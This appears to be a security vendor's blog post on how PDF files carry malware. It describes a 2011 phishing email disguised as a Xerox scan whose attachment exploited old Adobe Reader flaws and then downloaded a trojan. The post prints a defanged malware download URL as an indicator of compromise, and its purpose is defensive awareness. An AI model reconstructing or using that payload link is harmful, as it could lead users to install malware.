How PDF Files Hide Malware & Malicious Code

Chances are likely that your business uses Adobe Reader on a regular basis in order to read Portable Document Format (PDF) files. Adobe Reader, formerly known as Acrobat Reader, is the number one program that is used to handle and read PDF files. Adobe Reader unfortunately has a history of vulnerabilities that get exploited quite a bit. Once exploitation occurs, a malware payload can infect PCs by using elevated privileges.

For this reason, it’s important to understand how to analyze PDF files in order to avoid any PDF malware infiltrating your enterprise. Let’s go over what you need to look out for, and a real-life example of this PDF malware. 

How Are PDFs Infected with Malware & Malicious Code?

A PDF is a powerful document that contains static elements, such as images and text, or dynamic elements, such as forms. Sometimes they also contain embedded signatures. These elements are needed to make the documents visually appealing and consistent. While these are standard features of a PDF, they can also be turned into malicious tactics by hackers. Some things to look out for may include:

  • Multimedia content can include hidden risks
  • Hyperlinks can be destructive
  • JavaScript can be harmful
  • Code-Manipulated system commands can wreak havoc

Real-Life PDF Malware Example

While there has been a rise in the amount of PDF malware attacks, we saw this specifically occur back in 2011. Discover the story:

It’s early morning and I usually start my day by checking and reading emails from a few mailboxes. In one of my mailboxes, I came across a strange new message about a scanned document. As a security specialist, I was immediately suspicious and decided to investigate further. The email is shown below:

The body of the email says that the PDF attachment comes from a “Xerox WorkCentre Pro”, a very popular copier machine widely used in offices. We assume that this type of email and the “innocent” looking PDF attachment would convince most office recipients to open the attachment and thus install new malware on their systems. Commtouch’s Command Antivirus detects this malicious PDF as PDF/Expl.IQ. Recipients who actually open the file will see nothing – there is no text or image content displayed.

The red boxes highlight the vulnerabilities that this PDF attempts to exploit to crash vulnerable PDF reader applications:

All of these exploits have been patched in the most updated versions of Acrobat Reader. More information about these known vulnerabilities and affected PDF applications can be found at the above links. For example, “Exploit causes multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allowing remote attackers to execute arbitrary code”.

Once the vulnerable PDF reader application is successfully exploited, a new piece of malware is fetched from the following link: hxxp://open{BLOCKED}stralia.com.au/flash/uss05.exe. This new malware is then installed on the affected system, further exposing the system to other attacks. Command Antivirus detects this file as W32/SuspPack.DA.gen!Eldorado,

The lesson to be learned is that PDF reader software should always be kept up to date (and make sure you have an effective updated Antivirus). As we always say, prevention is better than disinfection.

Final Thoughts

To get further up to speed on everything related to Malware in PDFs, discover Cyren’s malware protection services, or download our report on all things malware.